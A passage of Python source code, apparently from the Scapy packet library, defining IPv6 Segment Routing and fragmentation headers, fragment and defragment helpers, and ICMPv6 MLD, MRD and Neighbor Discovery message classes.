p 1013 1014 registered_sr_tlv = {} 1015 1016 @classmethod 1017 def register_variant(cls): 1018 cls.registered_sr_tlv[cls.type.default] = cls 1019 1020 @classmethod 1021 def dispatch_hook(cls, pkt=None, *args, **kargs): 1022 if pkt: 1023 tmp_type = ord(pkt[:1]) 1024 return cls.registered_sr_tlv.get(tmp_type, cls) 1025 return cls 1026 1027 1028class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV): 1029 name = "IPv6 Option Header Segment Routing - Ingress Node TLV" 1030 # draft-ietf-6man-segment-routing-header-06 3.1.1 1031 fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs), 1032 ByteField("len", 18), 1033 ByteField("reserved", 0), 1034 ByteField("flags", 0), 1035 IP6Field("ingress_node", "::1")] 1036 1037 1038class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV): 1039 name = "IPv6 Option Header Segment Routing - Egress Node TLV" 1040 # draft-ietf-6man-segment-routing-header-06 3.1.2 1041 fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs), 1042 ByteField("len", 18), 1043 ByteField("reserved", 0), 1044 ByteField("flags", 0), 1045 IP6Field("egress_node", "::1")] 1046 1047 1048class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV): 1049 name = "IPv6 Option Header Segment Routing - Pad1 TLV" 1050 # RFC8754 sect 2.1.1.1 1051 fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs), 1052 FieldLenField("len", None, length_of="padding", fmt="B"), 1053 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 1054 1055 1056class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV): 1057 name = "IPv6 Option Header Segment Routing - PadN TLV" 1058 # RFC8754 sect 2.1.1.2 1059 fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs), 1060 FieldLenField("len", None, length_of="padding", fmt="B"), 1061 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 1062 1063 1064class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV): 1065 name = "IPv6 Option Header Segment Routing - HMAC TLV" 1066 # RFC8754 sect 2.1.2 1067 fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs), 1068 FieldLenField("len", None, length_of="hmac", 1069 adjust=lambda _, x: x + 48), 1070 BitField("D", 0, 1), 1071 BitField("reserved", 0, 15), 1072 IntField("hmackeyid", 0), 1073 StrLenField("hmac", "", 1074 length_from=lambda pkt: pkt.len - 48)] 1075 1076 1077class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr): 1078 name = "IPv6 Option Header Segment Routing" 1079 # RFC8754 sect 2. + flag bits from draft 06 1080 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 1081 ByteField("len", None), 1082 ByteField("type", 4), 1083 ByteField("segleft", None), 1084 ByteField("lastentry", None), 1085 BitField("unused1", 0, 1), 1086 BitField("protected", 0, 1), 1087 BitField("oam", 0, 1), 1088 BitField("alert", 0, 1), 1089 BitField("hmac", 0, 1), 1090 BitField("unused2", 0, 3), 1091 ShortField("tag", 0), 1092 IP6ListField("addresses", ["::1"], 1093 count_from=lambda pkt: (pkt.lastentry + 1)), 1094 PacketListField("tlv_objects", [], 1095 IPv6ExtHdrSegmentRoutingTLV, 1096 length_from=lambda pkt: 8 * pkt.len - 16 * ( 1097 pkt.lastentry + 1 1098 ))] 1099 1100 overload_fields = {IPv6: {"nh": 43}} 1101 1102 def post_build(self, pkt, pay): 1103 1104 if self.len is None: 1105 1106 # The extension must be align on 8 bytes 1107 tmp_mod = (-len(pkt) + 8) % 8 1108 if tmp_mod == 1: 1109 tlv = IPv6ExtHdrSegmentRoutingTLVPad1() 1110 pkt += raw(tlv) 1111 elif tmp_mod >= 2: 1112 # Add the padding extension 1113 tmp_pad = b"\x00" * (tmp_mod - 2) 1114 tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad) 1115 pkt += raw(tlv) 1116 1117 tmp_len = (len(pkt) - 8) // 8 1118 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:] 1119 1120 if self.segleft is None: 1121 tmp_len = len(self.addresses) 1122 if tmp_len: 1123 tmp_len -= 1 1124 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:] 1125 1126 if self.lastentry is None: 1127 lastentry = len(self.addresses) 1128 if lastentry == 0: 1129 warning( 1130 "IPv6ExtHdrSegmentRouting(): the addresses list is empty!" 1131 ) 1132 else: 1133 lastentry -= 1 1134 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:] 1135 1136 return _IPv6ExtHdr.post_build(self, pkt, pay) 1137 1138 1139# Fragmentation Header # 1140 1141class IPv6ExtHdrFragment(_IPv6ExtHdr): 1142 name = "IPv6 Extension Header - Fragmentation header" 1143 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 1144 BitField("res1", 0, 8), 1145 BitField("offset", 0, 13), 1146 BitField("res2", 0, 2), 1147 BitField("m", 0, 1), 1148 IntField("id", None)] 1149 overload_fields = {IPv6: {"nh": 44}} 1150 1151 def guess_payload_class(self, p): 1152 if self.offset > 0: 1153 return Raw 1154 else: 1155 return super(IPv6ExtHdrFragment, self).guess_payload_class(p) 1156 1157 1158def defragment6(packets): 1159 """ 1160 Performs defragmentation of a list of IPv6 packets. Packets are reordered. 1161 Crap is dropped. What lacks is completed by 'X' characters. 1162 """ 1163 1164 # Remove non fragments 1165 lst = [x for x in packets if IPv6ExtHdrFragment in x] 1166 if not lst: 1167 return [] 1168 1169 id = lst[0][IPv6ExtHdrFragment].id 1170 1171 llen = len(lst) 1172 lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id] 1173 if len(lst) != llen: 1174 warning("defragment6: some fragmented packets have been removed from list") # noqa: E501 1175 1176 # reorder fragments 1177 res = [] 1178 while lst: 1179 min_pos = 0 1180 min_offset = lst[0][IPv6ExtHdrFragment].offset 1181 for p in lst: 1182 cur_offset = p[IPv6ExtHdrFragment].offset 1183 if cur_offset < min_offset: 1184 min_pos = 0 1185 min_offset = cur_offset 1186 res.append(lst[min_pos]) 1187 del lst[min_pos] 1188 1189 # regenerate the fragmentable part 1190 fragmentable = b"" 1191 for p in res: 1192 q = p[IPv6ExtHdrFragment] 1193 offset = 8 * q.offset 1194 if offset != len(fragmentable): 1195 warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501 1196 fragmentable += b"X" * (offset - len(fragmentable)) 1197 fragmentable += raw(q.payload) 1198 1199 # Regenerate the unfragmentable part. 1200 q = res[0].copy() 1201 nh = q[IPv6ExtHdrFragment].nh 1202 q[IPv6ExtHdrFragment].underlayer.nh = nh 1203 q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable) 1204 del q[IPv6ExtHdrFragment].underlayer.payload 1205 q /= conf.raw_layer(load=fragmentable) 1206 del q.plen 1207 1208 if q[IPv6].underlayer: 1209 q[IPv6] = IPv6(raw(q[IPv6])) 1210 else: 1211 q = IPv6(raw(q)) 1212 return q 1213 1214 1215def fragment6(pkt, fragSize): 1216 """ 1217 Performs fragmentation of an IPv6 packet. 'fragSize' argument is the 1218 expected maximum size of fragment data (MTU). The list of packets is 1219 returned. 1220 1221 If packet does not contain an IPv6ExtHdrFragment class, it is added to 1222 first IPv6 layer found. If no IPv6 layer exists packet is returned in 1223 result list unmodified. 1224 """ 1225 1226 pkt = pkt.copy() 1227 1228 if IPv6ExtHdrFragment not in pkt: 1229 if IPv6 not in pkt: 1230 return [pkt] 1231 1232 layer3 = pkt[IPv6] 1233 data = layer3.payload 1234 frag = IPv6ExtHdrFragment(nh=layer3.nh) 1235 1236 layer3.remove_payload() 1237 del layer3.nh 1238 del layer3.plen 1239 1240 frag.add_payload(data) 1241 layer3.add_payload(frag) 1242 1243 # If the payload is bigger than 65535, a Jumbo payload must be used, as 1244 # an IPv6 packet can't be bigger than 65535 bytes. 1245 if len(raw(pkt[IPv6ExtHdrFragment])) > 65535: 1246 warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501 1247 return [] 1248 1249 s = raw(pkt) # for instantiation to get upper layer checksum right 1250 1251 if len(s) <= fragSize: 1252 return [pkt] 1253 1254 # Fragmentable part : fake IPv6 for Fragmentable part length computation 1255 fragPart = pkt[IPv6ExtHdrFragment].payload 1256 tmp = raw(IPv6(src="::1", dst="::1") / fragPart) 1257 fragPartLen = len(tmp) - 40 # basic IPv6 header length 1258 fragPartStr = s[-fragPartLen:] 1259 1260 # Grab Next Header for use in Fragment Header 1261 nh = pkt[IPv6ExtHdrFragment].nh 1262 1263 # Keep fragment header 1264 fragHeader = pkt[IPv6ExtHdrFragment] 1265 del fragHeader.payload # detach payload 1266 1267 # Unfragmentable Part 1268 unfragPartLen = len(s) - fragPartLen - 8 1269 unfragPart = pkt 1270 del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload 1271 1272 # Cut the fragmentable part to fit fragSize. Inner fragments have 1273 # a length that is an integer multiple of 8 octets. last Frag MTU 1274 # can be anything below MTU 1275 lastFragSize = fragSize - unfragPartLen - 8 1276 innerFragSize = lastFragSize - (lastFragSize % 8) 1277 1278 if lastFragSize <= 0 or innerFragSize == 0: 1279 warning("Provided fragment size value is too low. " + 1280 "Should be more than %d" % (unfragPartLen + 8)) 1281 return [unfragPart / fragHeader / fragPart] 1282 1283 remain = fragPartStr 1284 res = [] 1285 fragOffset = 0 # offset, incremeted during creation 1286 fragId = random.randint(0, 0xffffffff) # random id ... 1287 if fragHeader.id is not None: # ... except id provided by user 1288 fragId = fragHeader.id 1289 fragHeader.m = 1 1290 fragHeader.id = fragId 1291 fragHeader.nh = nh 1292 1293 # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... 1294 while True: 1295 if (len(remain) > lastFragSize): 1296 tmp = remain[:innerFragSize] 1297 remain = remain[innerFragSize:] 1298 fragHeader.offset = fragOffset # update offset 1299 fragOffset += (innerFragSize // 8) # compute new one 1300 if IPv6 in unfragPart: 1301 unfragPart[IPv6].plen = None 1302 tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp) 1303 res.append(tempo) 1304 else: 1305 fragHeader.offset = fragOffset # update offSet 1306 fragHeader.m = 0 1307 if IPv6 in unfragPart: 1308 unfragPart[IPv6].plen = None 1309 tempo = unfragPart / fragHeader / conf.raw_layer(load=remain) 1310 res.append(tempo) 1311 break 1312 return res 1313 1314 1315############################################################################# 1316############################################################################# 1317# ICMPv6* Classes # 1318############################################################################# 1319############################################################################# 1320 1321 1322icmp6typescls = {1: "ICMPv6DestUnreach", 1323 2: "ICMPv6PacketTooBig", 1324 3: "ICMPv6TimeExceeded", 1325 4: "ICMPv6ParamProblem", 1326 128: "ICMPv6EchoRequest", 1327 129: "ICMPv6EchoReply", 1328 130: "ICMPv6MLQuery", # MLDv1 or MLDv2 1329 131: "ICMPv6MLReport", 1330 132: "ICMPv6MLDone", 1331 133: "ICMPv6ND_RS", 1332 134: "ICMPv6ND_RA", 1333 135: "ICMPv6ND_NS", 1334 136: "ICMPv6ND_NA", 1335 137: "ICMPv6ND_Redirect", 1336 # 138: Do Me - RFC 2894 - Seems painful 1337 139: "ICMPv6NIQuery", 1338 140: "ICMPv6NIReply", 1339 141: "ICMPv6ND_INDSol", 1340 142: "ICMPv6ND_INDAdv", 1341 143: "ICMPv6MLReport2", 1342 144: "ICMPv6HAADRequest", 1343 145: "ICMPv6HAADReply", 1344 146: "ICMPv6MPSol", 1345 147: "ICMPv6MPAdv", 1346 # 148: Do Me - SEND related - RFC 3971 1347 # 149: Do Me - SEND related - RFC 3971 1348 151: "ICMPv6MRD_Advertisement", 1349 152: "ICMPv6MRD_Solicitation", 1350 153: "ICMPv6MRD_Termination", 1351 # 154: Do Me - FMIPv6 Messages - RFC 5568 1352 155: "ICMPv6RPL", # RFC 6550 1353 } 1354 1355icmp6typesminhdrlen = {1: 8, 1356 2: 8, 1357 3: 8, 1358 4: 8, 1359 128: 8, 1360 129: 8, 1361 130: 24, 1362 131: 24, 1363 132: 24, 1364 133: 8, 1365 134: 16, 1366 135: 24, 1367 136: 24, 1368 137: 40, 1369 # 139: 1370 # 140 1371 141: 8, 1372 142: 8, 1373 143: 8, 1374 144: 8, 1375 145: 8, 1376 146: 8, 1377 147: 8, 1378 151: 8, 1379 152: 4, 1380 153: 4, 1381 155: 4 1382 } 1383 1384icmp6types = {1: "Destination unreachable", 1385 2: "Packet too big", 1386 3: "Time exceeded", 1387 4: "Parameter problem", 1388 100: "Private Experimentation", 1389 101: "Private Experimentation", 1390 128: "Echo Request", 1391 129: "Echo Reply", 1392 130: "MLD Query", 1393 131: "MLD Report", 1394 132: "MLD Done", 1395 133: "Router Solicitation", 1396 134: "Router Advertisement", 1397 135: "Neighbor Solicitation", 1398 136: "Neighbor Advertisement", 1399 137: "Redirect Message", 1400 138: "Router Renumbering", 1401 139: "ICMP Node Information Query", 1402 140: "ICMP Node Information Response", 1403 141: "Inverse Neighbor Discovery Solicitation Message", 1404 142: "Inverse Neighbor Discovery Advertisement Message", 1405 143: "MLD Report Version 2", 1406 144: "Home Agent Address Discovery Request Message", 1407 145: "Home Agent Address Discovery Reply Message", 1408 146: "Mobile Prefix Solicitation", 1409 147: "Mobile Prefix Advertisement", 1410 148: "Certification Path Solicitation", 1411 149: "Certification Path Advertisement", 1412 151: "Multicast Router Advertisement", 1413 152: "Multicast Router Solicitation", 1414 153: "Multicast Router Termination", 1415 155: "RPL Control Message", 1416 200: "Private Experimentation", 1417 201: "Private Experimentation"} 1418 1419 1420class _ICMPv6(Packet): 1421 name = "ICMPv6 dummy class" 1422 overload_fields = {IPv6: {"nh": 58}} 1423 1424 def post_build(self, p, pay): 1425 p += pay 1426 if self.cksum is None: 1427 chksum = in6_chksum(58, self.underlayer, p) 1428 p = p[:2] + struct.pack("!H", chksum) + p[4:] 1429 return p 1430 1431 def hashret(self): 1432 return self.payload.hashret() 1433 1434 def answers(self, other): 1435 # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ... 1436 if (isinstance(self.underlayer, IPerror6) or 1437 isinstance(self.underlayer, _IPv6ExtHdr) and 1438 isinstance(other, _ICMPv6)): 1439 if not ((self.type == other.type) and 1440 (self.code == other.code)): 1441 return 0 1442 return 1 1443 return 0 1444 1445 1446class _ICMPv6Error(_ICMPv6): 1447 name = "ICMPv6 errors dummy class" 1448 1449 def guess_payload_class(self, p): 1450 return IPerror6 1451 1452 1453class ICMPv6Unknown(_ICMPv6): 1454 name = "Scapy6 ICMPv6 fallback class" 1455 fields_desc = [ByteEnumField("type", 1, icmp6types), 1456 ByteField("code", 0), 1457 XShortField("cksum", None), 1458 StrField("msgbody", "")] 1459 1460 1461# RFC 2460 # 1462 1463class ICMPv6DestUnreach(_ICMPv6Error): 1464 name = "ICMPv6 Destination Unreachable" 1465 fields_desc = [ByteEnumField("type", 1, icmp6types), 1466 ByteEnumField("code", 0, {0: "No route to destination", 1467 1: "Communication with destination administratively prohibited", # noqa: E501 1468 2: "Beyond scope of source address", # noqa: E501 1469 3: "Address unreachable", 1470 4: "Port unreachable"}), 1471 XShortField("cksum", None), 1472 ByteField("length", 0), 1473 X3BytesField("unused", 0), 1474 _ICMPExtensionPadField(), 1475 _ICMPExtensionField()] 1476 post_dissection = _ICMP_extpad_post_dissection 1477 1478 1479class ICMPv6PacketTooBig(_ICMPv6Error): 1480 name = "ICMPv6 Packet Too Big" 1481 fields_desc = [ByteEnumField("type", 2, icmp6types), 1482 ByteField("code", 0), 1483 XShortField("cksum", None), 1484 IntField("mtu", 1280)] 1485 1486 1487class ICMPv6TimeExceeded(_ICMPv6Error): 1488 name = "ICMPv6 Time Exceeded" 1489 fields_desc = [ByteEnumField("type", 3, icmp6types), 1490 ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501 1491 1: "fragment reassembly time exceeded"}), # noqa: E501 1492 XShortField("cksum", None), 1493 ByteField("length", 0), 1494 X3BytesField("unused", 0), 1495 _ICMPExtensionPadField(), 1496 _ICMPExtensionField()] 1497 post_dissection = _ICMP_extpad_post_dissection 1498 1499 1500# The default pointer value is set to the next header field of 1501# the encapsulated IPv6 packet 1502 1503 1504class ICMPv6ParamProblem(_ICMPv6Error): 1505 name = "ICMPv6 Parameter Problem" 1506 fields_desc = [ByteEnumField("type", 4, icmp6types), 1507 ByteEnumField( 1508 "code", 0, 1509 {0: "erroneous header field encountered", 1510 1: "unrecognized Next Header type encountered", 1511 2: "unrecognized IPv6 option encountered", 1512 3: "first fragment has incomplete header chain"}), 1513 XShortField("cksum", None), 1514 IntField("ptr", 6)] 1515 1516 1517class ICMPv6EchoRequest(_ICMPv6): 1518 name = "ICMPv6 Echo Request" 1519 fields_desc = [ByteEnumField("type", 128, icmp6types), 1520 ByteField("code", 0), 1521 XShortField("cksum", None), 1522 XShortField("id", 0), 1523 XShortField("seq", 0), 1524 StrField("data", "")] 1525 1526 def mysummary(self): 1527 return self.sprintf("%name% (id: %id% seq: %seq%)") 1528 1529 def hashret(self): 1530 return struct.pack("HH", self.id, self.seq) + self.payload.hashret() 1531 1532 1533class ICMPv6EchoReply(ICMPv6EchoRequest): 1534 name = "ICMPv6 Echo Reply" 1535 type = 129 1536 1537 def answers(self, other): 1538 # We could match data content between request and reply. 1539 return (isinstance(other, ICMPv6EchoRequest) and 1540 self.id == other.id and self.seq == other.seq and 1541 self.data == other.data) 1542 1543 1544# ICMPv6 Multicast Listener Discovery (RFC2710) # 1545 1546# tous les messages MLD sont emis avec une adresse source lien-locale 1547# -> Y veiller dans le post_build si aucune n'est specifiee 1548# La valeur de Hop-Limit doit etre de 1 1549# "and an IPv6 Router Alert option in a Hop-by-Hop Options 1550# header. (The router alert option is necessary to cause routers to 1551# examine MLD messages sent to multicast addresses in which the router 1552# itself has no interest" 1553class _ICMPv6ML(_ICMPv6): 1554 fields_desc = [ByteEnumField("type", 130, icmp6types), 1555 ByteField("code", 0), 1556 XShortField("cksum", None), 1557 ShortField("mrd", 0), 1558 ShortField("reserved", 0), 1559 IP6Field("mladdr", "::")] 1560 1561# general queries are sent to the link-scope all-nodes multicast 1562# address ff02::1, with a multicast address field of 0 and a MRD of 1563# [Query Response Interval] 1564# Default value for mladdr is set to 0 for a General Query, and 1565# overloaded by the user for a Multicast Address specific query 1566# TODO : See what we can do to automatically include a Router Alert 1567# Option in a Destination Option Header. 1568 1569 1570class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710 1571 name = "MLD - Multicast Listener Query" 1572 type = 130 1573 mrd = 10000 # 10s for mrd 1574 mladdr = "::" 1575 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} 1576 1577 1578# TODO : See what we can do to automatically include a Router Alert 1579# Option in a Destination Option Header. 1580class ICMPv6MLReport(_ICMPv6ML): # RFC 2710 1581 name = "MLD - Multicast Listener Report" 1582 type = 131 1583 overload_fields = {IPv6: {"hlim": 1, "nh": 58}} 1584 1585 def answers(self, query): 1586 """Check the query type""" 1587 return ICMPv6MLQuery in query 1588 1589# When a node ceases to listen to a multicast address on an interface, 1590# it SHOULD send a single Done message to the link-scope all-routers 1591# multicast address (FF02::2), carrying in its multicast address field 1592# the address to which it is ceasing to listen 1593# TODO : See what we can do to automatically include a Router Alert 1594# Option in a Destination Option Header. 1595 1596 1597class ICMPv6MLDone(_ICMPv6ML): # RFC 2710 1598 name = "MLD - Multicast Listener Done" 1599 type = 132 1600 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}} 1601 1602 1603# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) # 1604 1605class ICMPv6MLQuery2(_ICMPv6): # RFC 3810 1606 name = "MLDv2 - Multicast Listener Query" 1607 fields_desc = [ByteEnumField("type", 130, icmp6types), 1608 ByteField("code", 0), 1609 XShortField("cksum", None), 1610 ShortField("mrd", 10000), 1611 ShortField("reserved", 0), 1612 IP6Field("mladdr", "::"), 1613 BitField("Resv", 0, 4), 1614 BitField("S", 0, 1), 1615 BitField("QRV", 0, 3), 1616 ByteField("QQIC", 0), 1617 ShortField("sources_number", None), 1618 IP6ListField("sources", [], 1619 count_from=lambda pkt: pkt.sources_number)] 1620 1621 # RFC8810 - 4. Message Formats 1622 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} 1623 1624 def post_build(self, packet, payload): 1625 """Compute the 'sources_number' field when needed""" 1626 if self.sources_number is None: 1627 srcnum = struct.pack("!H", len(self.sources)) 1628 packet = packet[:26] + srcnum + packet[28:] 1629 return _ICMPv6.post_build(self, packet, payload) 1630 1631 1632class ICMPv6MLDMultAddrRec(Packet): 1633 name = "ICMPv6 MLDv2 - Multicast Address Record" 1634 fields_desc = [ByteField("rtype", 4), 1635 FieldLenField("auxdata_len", None, 1636 length_of="auxdata", 1637 fmt="B"), 1638 FieldLenField("sources_number", None, 1639 length_of="sources", 1640 adjust=lambda p, num: num // 16), 1641 IP6Field("dst", "::"), 1642 IP6ListField("sources", [], 1643 length_from=lambda p: 16 * p.sources_number), 1644 StrLenField("auxdata", "", 1645 length_from=lambda p: p.auxdata_len)] 1646 1647 def default_payload_class(self, packet): 1648 """Multicast Address Record followed by another one""" 1649 return self.__class__ 1650 1651 1652class ICMPv6MLReport2(_ICMPv6): # RFC 3810 1653 name = "MLDv2 - Multicast Listener Report" 1654 fields_desc = [ByteEnumField("type", 143, icmp6types), 1655 ByteField("res", 0), 1656 XShortField("cksum", None), 1657 ShortField("reserved", 0), 1658 ShortField("records_number", None), 1659 PacketListField("records", [], 1660 ICMPv6MLDMultAddrRec, 1661 count_from=lambda p: p.records_number)] 1662 1663 # RFC8810 - 4. Message Formats 1664 overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}} 1665 1666 def post_build(self, packet, payload): 1667 """Compute the 'records_number' field when needed""" 1668 if self.records_number is None: 1669 recnum = struct.pack("!H", len(self.records)) 1670 packet = packet[:6] + recnum + packet[8:] 1671 return _ICMPv6.post_build(self, packet, payload) 1672 1673 def answers(self, query): 1674 """Check the query type""" 1675 return isinstance(query, ICMPv6MLQuery2) 1676 1677 1678# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) # 1679 1680# TODO: 1681# - 04/09/06 troglocan : find a way to automatically add a router alert 1682# option for all MRD packets. This could be done in a specific 1683# way when IPv6 is the under layer with some specific keyword 1684# like 'exthdr'. This would allow to keep compatibility with 1685# providing IPv6 fields to be overloaded in fields_desc. 1686# 1687# At the moment, if user inserts an IPv6 Router alert option 1688# none of the IPv6 default values of IPv6 layer will be set. 1689 1690class ICMPv6MRD_Advertisement(_ICMPv6): 1691 name = "ICMPv6 Multicast Router Discovery Advertisement" 1692 fields_desc = [ByteEnumField("type", 151, icmp6types), 1693 ByteField("advinter", 20), 1694 XShortField("cksum", None), 1695 ShortField("queryint", 0), 1696 ShortField("robustness", 0)] 1697 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} 1698 # IPv6 Router Alert requires manual inclusion 1699 1700 def extract_padding(self, s): 1701 return s[:8], s[8:] 1702 1703 1704class ICMPv6MRD_Solicitation(_ICMPv6): 1705 name = "ICMPv6 Multicast Router Discovery Solicitation" 1706 fields_desc = [ByteEnumField("type", 152, icmp6types), 1707 ByteField("res", 0), 1708 XShortField("cksum", None)] 1709 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} 1710 # IPv6 Router Alert requires manual inclusion 1711 1712 def extract_padding(self, s): 1713 return s[:4], s[4:] 1714 1715 1716class ICMPv6MRD_Termination(_ICMPv6): 1717 name = "ICMPv6 Multicast Router Discovery Termination" 1718 fields_desc = [ByteEnumField("type", 153, icmp6types), 1719 ByteField("res", 0), 1720 XShortField("cksum", None)] 1721 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}} 1722 # IPv6 Router Alert requires manual inclusion 1723 1724 def extract_padding(self, s): 1725 return s[:4], s[4:] 1726 1727 1728# ICMPv6 Neighbor Discovery (RFC 2461) # 1729 1730icmp6ndopts = {1: "Source Link-Layer Address", 1731 2: "Target Link-Layer Address", 1732 3: "Prefix Information", 1733 4: "Redirected Header", 1734 5: "MTU", 1735 6: "NBMA Shortcut Limit Option", # RFC2491 1736 7: "Advertisement Interval Option", 1737 8: "Home Agent Information Option", 1738 9: "Source Address List", 1739 10: "Target Address List", 1740 11: "CGA Option", # RFC 3971 1741 12: "RSA Signature Option", # RFC 3971 1742 13: "Timestamp Option", # RFC 3971 1743 14: "Nonce option", # RFC 3971 1744 15: "Trust Anchor Option", # RFC 3971 1745 16: "Certificate Option", # RFC 3971 1746 17: "IP Address Option", # RFC 4068 1747 18: "New Router Prefix Information Option", # RFC 4068 1748 19: "Link-layer Address Option", # RFC 4068 1749 20: "Neighbor Advertisement Acknowledgement Option", 1750 21: "CARD Request Option", # RFC 4065/4066/4067 1751 22: "CARD Reply Option", # RFC 4065/4066/4067 1752 23: "MAP Option", # RFC 4140 1753 24: "Route Information Option", # RFC 4191 1754 25: "Recursive DNS Server Option", 1755 26: "IPv6 Router Advertisement Flags Option" 1756 } 1757 1758icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr", 1759 2: "ICMPv6NDOptDstLLAddr", 1760 3: "ICMPv6NDOptPrefixInfo", 1761 4: "ICMPv6NDOptRedirectedHdr", 1762 5: "ICMPv6NDOptMTU", 1763 6: "ICMPv6NDOptShortcutLimit", 1764 7: "ICMPv6NDOptAdvInterval", 1765 8: "ICMPv6NDOptHAInfo", 1766 9: "ICMPv6NDOptSrcAddrList", 1767 10: "ICMPv6NDOptTgtAddrList", 1768 # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py 1769 # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py 1770 # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py 1771 # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py 1772 # 15: Do Me, 1773 # 16: Do Me, 1774 17: "ICMPv6NDOptIPAddr", 1775 18: "ICMPv6NDOptNewRtrPrefix", 1776 19: "ICMPv6NDOptLLA", 1777 # 18: Do Me, 1778 # 19: Do Me, 1779 # 20: Do Me, 1780 # 21: Do Me, 1781 # 22: Do Me, 1782 23: "ICMPv6NDOptMAP", 1783 24: "ICMPv6NDOptRouteInfo", 1784 25: "ICMPv6NDOptRDNSS", 1785 26: "ICMPv6NDOptEFA", 1786 31: "ICMPv6NDOptDNSSL", 1787 37: "ICMPv6NDOptCaptivePortal", 1788 38: "ICMPv6NDOptPREF64", 1789 } 1790 1791icmp6ndraprefs = {0: "Medium (default)", 1792 1: "High", 1793 2: "Reserved", 1794 3: "Low"} # RFC 4191 1795 1796 1797class _ICMPv6NDGuessPayload: 1798 name = "Dummy ND class that implements guess_payload_class()" 1799 1800 def guess_payload_class(self, p): 1801 if len(p) > 1: 1802 return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown) 1803 1804 1805# Beginning of ICMPv6 Neighbor Discovery Options. 1806 1807class ICMPv6NDOptDataField(StrLenField): 1808 __slots__ = ["strip_zeros"] 1809 1810 def __init__(self, name, default, strip_zeros=False, **kwargs): 1811 super().__init__(name, default, **kwargs) 1812 self.strip_zeros = strip_zeros 1813 1814 def i2len(self, pkt, x): 1815 return len(self.i2m(pkt, x)) 1816 1817 def i2m(self, pkt, x): 1818 r = (len(x) + 2) % 8 1819 if r: 1820 x += b"\x00" * (8 - r) 1821 return x 1822 1823 def m2i(self, pkt, x): 1824 if self.strip_zeros: 1825 x = x.rstrip(b"\x00") 1826 return x 1827 1828 1829class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): 1830 name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" 1831 fields_desc = [ByteField("type", 0), 1832 FieldLenField("len", None, length_of="data", fmt="B", 1833 adjust=lambda pkt, x: (2 + x) // 8), 1834 ICMPv6NDOptDataField("data", "", strip_zeros=False, 1835 length_from=lambda pkt: 1836 8 * max(pkt.len, 1) - 2)] 1837 1838# NOTE: len includes type and len field. Expressed in unit of 8 bytes 1839# TODO: Revoir le coup du ETHER_ANY 1840 1841 1842class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet): 1843 name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address" 1844 fields_desc = [ByteField("type", 1), 1845 ByteField("len", 1), 1846 SourceMACField("lladdr")] 1847 1848 def mysummary(self): 1849 return self.sprintf("%name% %lladdr%") 1850 1851 1852class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr): 1853 name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address" 1854 type = 2 1855 1856 1857class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet): 1858 name = "ICMPv6 Neighbor Discovery Option - Prefix Information" 1859 fields_desc = [ByteField("type", 3), 1860 ByteField("len", 4), 1861 ByteField("prefixlen", 64), 1862 BitField("L", 1, 1), 1863 BitField("A", 1, 1), 1864 BitField("R", 0, 1), 1865 BitField("res1", 0, 5), 1866 XIntField("validlifetime", 0xffffffff), 1867 XIntField("preferredlifetime", 0xffffffff), 1868 XIntField("res2", 0x00000000), 1869 IP6Field("prefix", "::")] 1870 1871 def mysummary(self): 1872 return self.sprintf("%name% %prefix%/%prefixlen% " 1873 "On-link %L% Autonomous Address %A% " 1874 "Router Address %R%") 1875 1876# TODO: We should also limit the size of included packet to something 1877# like (initiallen - 40 - 2) 1878 1879 1880class 